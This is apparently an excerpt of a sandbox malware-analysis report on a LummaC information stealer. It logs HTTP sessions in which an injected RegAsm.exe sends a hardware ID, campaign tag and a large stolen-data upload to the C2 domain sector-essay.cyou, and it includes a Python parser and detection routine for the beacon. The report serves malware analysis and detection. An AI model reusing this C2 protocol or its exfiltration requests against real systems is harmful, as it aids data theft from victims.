                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4%2FF8izdLfH3sqvlBIeofLRnwFL0UkSfqOHen5JORZypDFClRyZGzm%2FTMzcZ%2FOrEi6gZe3WQY7Jr1rVlNky%2B2XSH%2BjXcwSYkASNfR5cgj8%2BheD%2BB6kMtCdkx0pjhf3%2BwqjfO9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b9682e405e7e-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=2075&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21521&delivery_rate=1272331&cwnd=229&unsent_bytes=0&cid=f4640d0990dcfe69&ts=899&x=0"
                        2024-11-24 07:35:47 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                        Data Ascii: eok 8.46.123.75
                        2024-11-24 07:35:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.5 | 49710 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-11-24 07:35:49 UTC | 274 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=Q50S24M0B9
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 1208
                        Host: sector-essay.cyou
                        2024-11-24 07:35:49 UTC1208OUTData Raw: 2d 2d 51 35 30 53 32 34 4d 30 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34 0d 0a 2d 2d 51 35 30 53 32 34 4d 30 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 35 30 53 32 34 4d 30 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 51 35 30 53 32 34 4d 30 42 39 0d 0a 43 6f 6e
                        Data Ascii: --Q50S24M0B9Content-Disposition: form-data; name="hwid"5697ED7B3A758717FEE815EB403F5D54--Q50S24M0B9Content-Disposition: form-data; name="pid"1--Q50S24M0B9Content-Disposition: form-data; name="lid"yau6Na--6928154717--Q50S24M0B9Con
                        2024-11-24 07:35:50 UTC | 1012 | IN | HTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=653ept7uvpsmetsdpldronin79; expires=Thu, 20-Mar-2025 01:22:28 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SnSS4KhfHhY2KbYVFMilCNFFK9cRGQadsXdqpvyVgdKAEGITd85H7LJYoFuR9PHBtKcda2h86hZ0NC5QJIoGCirtWSYKRn%2Feb1v2QeZe87HshfAKUuEus7PFjiULQ82UIRUi6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b97679e47d18-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1922&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2118&delivery_rate=1600000&cwnd=216&unsent_bytes=0&cid=b4ad17cdb7724562&ts=750&x=0"
                        2024-11-24 07:35:50 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                        Data Ascii: eok 8.46.123.75
                        2024-11-24 07:35:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.5 | 49711 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-11-24 07:35:51 UTC | 278 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=7YVFSTRYYY2P
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 569419
                        Host: sector-essay.cyou
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 2d 2d 37 59 56 46 53 54 52 59 59 59 32 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34 0d 0a 2d 2d 37 59 56 46 53 54 52 59 59 59 32 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 59 56 46 53 54 52 59 59 59 32 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 37 59 56 46 53 54 52 59 59
                        Data Ascii: --7YVFSTRYYY2PContent-Disposition: form-data; name="hwid"5697ED7B3A758717FEE815EB403F5D54--7YVFSTRYYY2PContent-Disposition: form-data; name="pid"1--7YVFSTRYYY2PContent-Disposition: form-data; name="lid"yau6Na--6928154717--7YVFSTRYY
                        2024-11-24 07:35:51 UTC15331OUTData Raw: ce 59 b7 3d a2 dd 3e 1b 44 34 7b da 78 94 2a 25 9b 06 a3 d6 37 7f 3d 82 5d 26 2a 5b 60 6d 94 48 10 c5 01 62 98 05 d5 f6 cb 00 bc 6b c5 4c 48 d0 c7 37 fb 07 ef 44 74 9b e8 aa 3b df 03 94 c6 2d d6 af 49 b7 54 34 db f0 77 6c 5b 11 74 53 8e 04 28 e7 05 7e 6d 21 23 21 44 27 86 82 3d 07 19 b9 25 f2 cc 60 34 5c 72 1c 62 ec f6 cd 9d 73 27 30 59 a5 d5 c3 d1 26 0f c3 c3 9a 2f d0 0c 38 1d c2 76 cc ff f4 0b 8f dc e7 4b 82 8c 5b 9b 9e 68 10 51 31 2d f6 48 b8 28 5a 32 f9 ff bd a6 05 79 38 0f 18 8e 99 50 bf 28 48 8d fa df 35 2f cb a2 60 3f 1c 12 13 2e 20 34 ae d2 e0 4e 5b dc 85 61 bf 0e 63 fd 8d 87 38 f5 2c 47 b3 26 2c f8 44 41 06 95 ab ae 11 b7 de 28 80 b4 22 be 1a 56 94 74 ea fe ad 31 01 bf 22 80 3a c9 ed 6b 81 7b 16 52 6e 0a e8 ec e3 c0 86 76 97 e8 c5 6c b4 58 7d ad
                        Data Ascii: Y=>D4{x*%7=]&*[`mHbkLH7Dt;-IT4wl[tS(~m!#!D'=%`4\rbs'0Y&/8vK[hQ1-H(Z2y8P(H5/`?. 4N[ac8,G&,DA("Vt1":k{RnvlX}
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 03 ee 84 40 f8 e7 07 19 7e 0b ac 83 a8 13 6c 39 ba db 81 76 f4 9f 7b f1 d9 94 40 fc d4 65 a2 d0 a6 9f 58 05 ee 42 5f 26 15 8b e4 5a af ef 3e 82 f7 ce 78 ae 65 16 86 f7 2c dc 1e 3e 14 b4 98 50 4f d5 1d 09 ce a9 1e bb a3 34 54 cf 9f 7a b7 58 a0 1f 14 2a 5f 91 7f 09 e0 67 82 1a 76 a6 54 75 75 e8 75 6d 0b 5f fd 5a 70 73 44 58 65 5f cd 7c 43 b7 b3 42 56 f5 76 1c 9c c2 37 09 57 46 03 42 68 7b 2a 2d a5 82 7f 93 cd 1a 7a 39 56 85 03 38 ea d4 05 00 67 4a 93 dd df 79 b8 2b 00 ee 07 3d c4 1f bf 54 01 2e a1 80 84 98 e0 61 1c 1c 9e fb 7b a1 6e 13 1e 3c 91 89 5c fd bf e1 8b 31 f3 1f 5c 3a 0b ce 22 4c 4e 2b cd 86 9b 02 fc c8 74 e4 3c db 37 7f 6f a7 4a cb 36 79 c8 9d 17 c1 51 19 96 73 81 f5 c3 90 78 38 a5 9a ed 5d 6c 95 fd ac 29 bf e7 d8 9d 27 47 61 19 64 9a 6a bd ae b2
                        Data Ascii: @~l9v{@eXB_&Z>xe,>PO4TzX*_gvTuuum_ZpsDXe_|CBVv7WFBh{*-z9V8gJy+=T.a{n<\1\:"LN+t<7oJ6yQsx8]l)'Gadj
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 52 81 63 26 64 89 04 fa e3 8f 91 10 a0 9e 14 63 d1 f0 7c 1f 3c a6 33 04 ca 96 dc 1e b4 e1 27 40 80 54 98 1e 5f c5 73 81 63 64 96 fb b2 62 91 83 a5 6a 8d c7 95 6b 42 02 2e 0b 69 51 c1 17 92 89 99 cb 94 91 5a 4d e8 33 45 76 ef c5 03 c1 04 1d b1 a3 b8 cf fb f0 0c 92 a2 71 55 6b 43 d8 37 40 18 22 c0 06 10 be 43 f6 6d 14 d1 4e 95 7c a1 3d 54 78 c1 81 c2 de 5b fb fa ae 07 92 64 aa 06 bb 8c 95 fc 77 ac a6 a4 6d eb df 2e 8a 5d f4 07 3e f9 32 b6 2d 88 ed b9 d1 fe 85 ef be 67 d0 a6 4a aa 84 fd 3c 85 31 81 a2 64 10 66 4c ee 30 d2 9d 1f 72 d3 6c cc da 2d 7a d4 d7 16 1f ef 45 32 6d 88 3c ee cf 0b 88 a0 59 d9 20 49 2d 1b c5 47 c9 81 ca bd 21 31 9d e2 b9 7b 07 24 c1 68 a2 45 68 56 6a ca 0b c2 54 ef 48 71 af 51 46 54 a8 f3 eb fc 20 8a 37 be 0c ec fd f0 ed 40 b8 d4 da e9
                        Data Ascii: Rc&dc|<3'@T_scdbjkB.iQZM3EvqUkC7@"CmN|=Tx[dwm.]>2-gJ<1dfL0rl-zE2m<Y I-G!1{$hEhVjTHqQFT 7@
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 3e 1a 2f bd f7 a7 0f b2 a0 ef f7 20 8d 99 e3 14 5a 2d f1 c9 90 5e 41 02 f7 ec 4e 9a 3f 97 3b 54 a8 28 5b bf fc 5f d0 16 a4 2d ed 1f 41 90 3f 0d 86 6a 00 9a 10 3f 6c b7 57 85 a8 20 52 10 25 88 56 87 43 76 ec a4 ee d9 fa 00 b1 4a e7 c5 cc d0 7f 07 11 54 1d 41 c4 04 aa da e7 50 0c 1b e3 e9 fb ff b7 2a fe 9f 43 34 06 66 cc 45 22 38 18 3a 70 11 d0 c1 dd 8c 93 03 e1 4a 7f c9 53 7d 54 71 14 20 fd ca 77 2e eb 5e 54 80 04 bf 19 05 c1 76 be d3 ba 5f a7 00 91 9f e2 d4 22 57 02 f0 0b 29 9f 08 31 81 d9 71 e4 5a ab 70 22 6e 6d fb a9 fc e1 d6 b3 31 e9 8b 1e 56 a4 24 a4 cc 41 c8 fa a8 87 f9 33 a8 ad 8c 2f b1 79 b9 c2 ee 31 7a e6 55 37 e7 75 ab 16 7c ae b9 33 1c 62 cb 42 71 8b 85 30 6a 39 83 0a 45 27 00 bd 61 af 09 be 38 ee 9d 5c ba 1f f9 c9 44 f8 67 44 6e 9b 4e 2b b7 51
                        Data Ascii: >/ Z-^AN?;T([_-A?j?lW R%VCvJTAP*C4fE"8:pJS}Tq w.^Tv_"W)1qZp"nm1V$A3/y1zU7u|3bBq0j9E'a8\DgDnN+Q
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 4a f5 81 cc 5a 10 0a e8 b0 d3 f6 02 3d 71 d4 9a 8f 00 e5 9c 7e 71 06 d4 6b 30 5a a4 01 4e 33 bd 3e 71 37 7e a4 0d 70 1b 2a ec 8e 8c b2 1f 97 27 ab ab 91 b3 8c 57 95 7b 8f 0d 46 74 4b 34 1f 4c af 8d 20 91 e9 02 99 0e 3f 26 75 5b 26 59 f6 bc bf 60 fa 36 94 c8 23 b5 ec ac 87 34 27 90 af cf 03 b3 4e 42 17 26 36 7e 9b 22 9e 56 31 db c9 58 a9 cd 2c af 85 34 af 75 40 1f 74 61 6d 80 0d 22 d2 12 e4 17 30 03 77 12 74 9a fc 8b fe aa a3 1f 62 47 2e 4e c4 bc 97 e6 40 28 63 c1 67 25 04 bb da 0c d9 a8 5e 14 c1 f4 bc 21 d1 35 26 ec a4 07 c3 bc 92 e7 ff 4b 9b 6c ba 93 e8 9f 14 1f 61 2c 4c 60 95 98 2f e7 e3 62 13 b1 3e a7 e5 59 42 93 96 12 43 7d 3b d5 d6 ee 6f cd 96 8c b8 ed a4 5a 87 92 10 16 ec 3a 62 f3 88 38 81 ed 2b d7 9b 9f e5 98 a3 8c 5b 7e 77 9c 8b 9a c2 8f b9 71 47
                        Data Ascii: JZ=q~qk0ZN3>q7~p*'W{FtK4L ?&u[&Y`6#4'NB&6~"V1X,4u@tam"0wtbG.N@(cg%^!5&Kla,L`/b>YBC};oZ:b8+[~wqG
                        2024-11-24 07:35:51 UTC15331OUTData Raw: f3 34 8a 71 56 b0 79 cf ee d2 f0 8a fa e9 05 14 43 03 df 2c 49 08 99 fb ee f5 4f 09 0c c7 46 ef 22 dc 81 88 59 52 94 de 4a 59 5a 8d ad 33 9c d1 6f c7 c8 f2 c1 be 38 6e 52 7c 77 41 57 5a e2 ec 44 56 1c 2d 4c 82 69 2f 9d da b6 57 1c 73 fb 32 d4 a7 00 23 30 21 84 89 0f c4 12 17 b9 05 ba 66 8f 1f 73 bd 54 22 c3 3e a9 5e 2a e1 fa bb 4d e0 96 c2 01 35 49 7f 94 5b 22 45 76 32 79 ff 6b 64 34 91 64 c2 6a dd 1a 22 1e af d1 f0 ca 5e 10 9f 16 a1 04 07 0b 00 14 ef 9b 31 77 9f 38 64 d5 42 96 85 8d 9c e4 d1 e6 e5 c0 17 c2 67 4a 88 67 4a d5 1f 3d 1a 1b 74 34 3b 19 9f 35 f0 13 53 30 47 c2 86 95 fd 90 63 61 62 fa 78 5f e6 29 ad df d6 8f d1 73 6c ad 0a 4c 98 a1 4b 95 89 af 93 25 28 05 39 78 a4 7c b2 0b 4a c0 30 bb c3 5b 97 96 ee cb 7a 1f 47 8c 8d 5b 33 0b 12 30 e8 98 d4 55
                        Data Ascii: 4qVyC,IOF"YRJYZ3o8nR|wAWZDV-Li/Ws2#0!fsT">^*M5I["Ev2ykd4dj"^1w8dBgJgJ=t4;5S0Gcabx_)slLK%(9x|J0[zG[30U
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 71 78 5e de 20 1d eb a7 e3 c0 4a 08 24 f6 c5 d1 28 02 46 c1 12 fc 3f be b9 a7 11 5f 53 e2 6f 98 3c f6 93 eb e1 71 89 08 7a 27 26 f5 4b 95 d1 16 cd c5 41 93 22 1f d1 4a ca 20 73 d6 50 8f 7d 5a d0 b8 9e d6 fe 3d e3 37 21 a0 b9 19 6a 6b a1 4f f3 9b ce 5e ce 8f 32 d5 8b b8 73 7b 7f 2a fa ce e4 40 41 8b ca fc cf a8 fc 10 6d 62 4a 8d 19 dd ac 99 a7 8e fd a5 f8 09 55 6e 23 ee c4 89 dc 6e 17 85 33 f6 9d e7 15 37 2f 28 23 f8 4a 7f df 38 41 7a 3f df 97 ad 6a aa ef 90 9c f5 cb a6 06 59 a8 e1 43 79 07 88 95 2e 51 1f 86 b7 78 89 9b 23 86 3e 4e 3d eb e7 01 18 1a d8 ea 9f c3 51 fe 1d 6a 9b 66 f9 9f bd 0a 81 b2 6e d9 97 95 81 87 56 39 ab f8 f8 03 bf 44 45 04 49 87 a4 94 10 7d c7 ba 44 1d e9 b9 d1 f2 e0 6e 37 9c 31 36 5b 71 4a bb 97 9a 36 dd a2 cf f1 a9 b8 7a 68 6b 63 bd
                        Data Ascii: qx^ J$(F?_So<qz'&KA"J sP}Z=7!jkO^2s{*@AmbJUn#n37/(#J8Az?jYCy.Qx#>N=QjfnV9DEI}Dn716[qJ6zhkc
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 90 e2 88 c5 ca a4 09 cb 06 e2 60 75 66 9e 13 b7 98 fd cf 76 17 4d 90 78 ad eb ff ba 13 f6 82 ab 5a 52 27 62 44 e3 1b 54 1e 98 06 24 96 bd 4d dd 8d 3d fa 94 c9 3a 21 10 61 ef 3d 8a 6f eb a6 75 f7 31 fc 6b f9 ab 35 ac 28 df 6f e7 5e af 96 c7 e2 a5 92 68 76 5e 8d e6 fe cc c4 95 23 eb 63 67 bf b5 ff b7 8b 26 b8 f0 f5 97 6a 97 ff 86 95 d7 21 18 32 c4 7e 31 40 62 18 e9 73 e2 3c 8b c6 c3 72 aa ce 71 65 3c 67 c7 d1 26 6e d7 cc 0e 10 94 ea ba c6 43 d6 3f b2 87 78 b1 b2 c1 58 01 67 4c 79 c5 a7 91 93 b2 6e af 88 f0 32 21 ab 20 9a 74 a9 51 ab 88 59 13 38 04 c7 19 e7 8f d6 5b 7d 98 b9 79 40 c8 52 f9 78 dd d6 de ec ab d5 51 31 12 98 df f8 b8 66 e3 d2 ed bd ce 4b c9 74 12 82 d4 cc 56 02 6d 4f 5c ae 63 4f 16 22 22 c7 6e 31 dd 9d e0 e8 4d c4 b2 e2 ac 95 36 d1 1d bd 98 49
                        Data Ascii: `ufvMxZR'bDT$M=:!a=ou1k5(o^hv^#cg&j!2~1@bs<rqe<g&nC?xXgLyn2! tQY8[}y@RxQ1fKtVmO\cO""n1M6I
                        2024-11-24 07:35:51 UTC15331OUTData Raw: 0d a6 eb 5f 48 31 57 dd 16 d4 24 a2 3e a0 90 46 7d dc ac eb 0e 16 0f 94 21 7b 2f fb 8c e8 e9 e2 16 68 25 05 77 be 1e b1 ab 56 8d a0 5c be 5f 75 2d c3 a5 bc 82 2f 0c be 7f 3a 9d d6 a0 01 e8 f6 78 1e aa ee 53 c7 7f 00 3c 5b 87 7c 3d 0e 47 a8 e0 df c3 43 e6 ff f1 27 bd 12 de cc 79 56 19 75 45 f3 be f7 44 89 37 df 6d 04 78 f5 de bc 88 8f 7a 6a 99 bb 6e 78 12 e0 7b d5 17 2d 78 1e 71 60 91 3f 7b 2f 49 05 8c 55 1b 0f 68 03 1b 79 58 12 3c 73 8c 1c 57 42 c1 47 84 78 84 2a bc f6 c5 df a1 92 d9 74 e1 6d 71 e6 db 02 fb 5c 4c 4d c3 44 f0 38 33 92 51 e2 1d b2 51 16 5f 64 9a cc 97 fa 84 6f 73 66 e1 cb 58 51 9a b0 9a 91 33 0c 43 1c 79 6e 2a 01 cd bb ac 7a 0d 9f a8 67 be 93 af 8c ad ef 91 ed 68 77 41 0a f2 eb 05 5e 3a 2d bb ca 07 c6 0e 8f b8 24 23 31 01 43 62 17 2c 16 71
                        Data Ascii: _H1W$>F}!{/h%wV\_u-/:xS<[|=GC'yVuED7mxzjnx{-xq`?{/IUhyX<sWBGx*tmq\LMD83QQ_dosfXQ3Cyn*zghwA^:-$#1Cb,q
                        2024-11-24 07:35:54 UTC | 1023 | IN | HTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:54 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=cngl21c7fnpkacsa3v4cri2g81; expires=Thu, 20-Mar-2025 01:22:32 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SVSvdxOZXsOOJG9QN%2BVRoVxLsuKQiZDx%2BkTDNHlKhdMuseOJwN9UrgrXieogOM5jGddNOmNgORW6ET6vI0LCMlgADklkWnbnl0vquRYSRkINgEJMNDoWWA01B5ZeJq%2BWE5mWGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b986cd9843b5-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1730&sent=202&recv=593&lost=0&retrans=0&sent_bytes=2843&recv_bytes=571961&delivery_rate=1650650&cwnd=225&unsent_bytes=0&cid=db38436929f534cb&ts=2353&x=0"


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.5 | 49722 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-11-24 07:35:55 UTC | 265 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 87
                        Host: sector-essay.cyou
                        2024-11-24 07:35:55 UTC | 87 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d 26 68 77 69 64 3d 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34
                        Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6928154717&j=&hwid=5697ED7B3A758717FEE815EB403F5D54
                        2024-11-24 07:35:56 UTC | 1013 | IN | HTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=22chn6rhparhammscg5vlg7k35; expires=Thu, 20-Mar-2025 01:22:35 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V5Xr3BkrtnphsjFZzUcQxZ0tjbsqOmAQFT1Ea2bQQGe9Ux%2BEJEfMnRyuVH9EBCskQ95midNINxF3StXG2FOrEnJkLWlMMyDdLCgiE12SuYRRbwfkTb%2BZp87NAF6B80mTTnP1uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b99e0d1319b2-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1782&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=988&delivery_rate=1588683&cwnd=149&unsent_bytes=0&cid=b1ae0f353bf314f6&ts=732&x=0"
                        2024-11-24 07:35:56 UTC | 54 | IN | Data Raw: 33 30 0d 0a 75 35 35 55 54 74 5a 76 30 57 30 51 4a 5a 72 36 73 6b 36 73 54 70 44 77 72 36 4f 65 75 44 42 47 51 42 2b 47 73 66 38 75 45 30 50 67 77 77 3d 3d 0d 0a
                        Data Ascii: 30u55UTtZv0W0QJZr6sk6sTpDwr6OeuDBGQB+Gsf8uE0Pgww== (chunk size 0x30 = 48 bytes, then the chunk)
                        2024-11-24 07:35:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a (terminating zero-length chunk)
                        Data Ascii: 0
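The session above is the complete C2 round trip: one form-encoded POST to /api on sector-essay.cyou and one chunked reply whose only chunk is base64 text. The following Python is an added example, not Joe Sandbox output: it rebuilds the request and the response body from the hex dumps on this page, parses the beacon fields, dechunks and base64-decodes the reply, and implements a shape-based match on the request that a network detection could use. The decoded reply is kept as opaque bytes because the page does not show how it is decrypted.

```python
"""Parse the LummaC beacon exchange captured in the session above.

Added example (not Joe Sandbox output). The request and the response body
are reconstructed from the hex dumps on this page; the decoded chunk is kept
as opaque bytes because the page does not show how the reply is decrypted.
"""
import base64
import re
from urllib.parse import parse_qs

# Constructed from the captured session: request line, headers, 87-byte body.
REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 87\r\n"
    b"Host: sector-essay.cyou\r\n"
    b"\r\n"
    b"act=get_message&ver=4.0&lid=yau6Na--6928154717&j=&hwid=5697ED7B3A758717FEE815EB403F5D54"
)

# The two inbound "Data Raw" records after the response headers, verbatim.
RESPONSE_BODY = bytes.fromhex(
    "33 30 0d 0a 75 35 35 55 54 74 5a 76 30 57 30 51 4a 5a 72 36 73 6b 36 73 54 70 "
    "44 77 72 36 4f 65 75 44 42 47 51 42 2b 47 73 66 38 75 45 30 50 67 77 77 3d 3d 0d 0a "
    "30 0d 0a 0d 0a"
)

HWID_RE = re.compile(r"^[0-9A-F]{32}$")


def parse_request(raw: bytes):
    """Split an HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body: hex size line, data, CRLF, ..., 0."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2                               # skip the chunk's trailing CRLF


def parse_beacon(raw: bytes) -> dict:
    """Return the form fields of the beacon body, one value per key."""
    _method, _path, headers, body = parse_request(raw)
    if headers.get("content-type") != "application/x-www-form-urlencoded":
        return {}
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def looks_like_lumma_beacon(raw: bytes) -> bool:
    """Shape match on the request above: POST /api with a form body carrying
    act=, ver=, lid= and a 32-hex-digit hwid=."""
    method, path, _headers, _body = parse_request(raw)
    fields = parse_beacon(raw)
    return (method == "POST" and path == "/api"
            and {"act", "ver", "lid", "hwid"}.issubset(fields)
            and HWID_RE.match(fields["hwid"]) is not None)


def decode_response(body: bytes) -> bytes:
    """Dechunk and base64-decode the C2 reply; the result is opaque bytes here,
    since the page does not show the decryption step."""
    return base64.b64decode(dechunk(body))


if __name__ == "__main__":
    print(parse_beacon(REQUEST))
    print("lumma beacon:", looks_like_lumma_beacon(REQUEST))
    print(len(decode_response(RESPONSE_BODY)), "bytes of opaque payload")
```

The hwid is a 32-character uppercase hex string and lid carries the campaign tag; both are stable per build, so they make better hunt keys across captures than the Host header, which rotates with the domain.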



                        Target ID:0
                        Start time:02:35:32
                        Start date:24/11/2024
                        Path:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\ZjH6H6xqo7.exe"
                        Imagebase:0xae0000
                        File size:44'544 bytes
                        MD5 hash:16A1FBD21AF85D43B1AC31BF1829A152
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"
                        Imagebase:0xc00000
                        File size:2'141'552 bytes
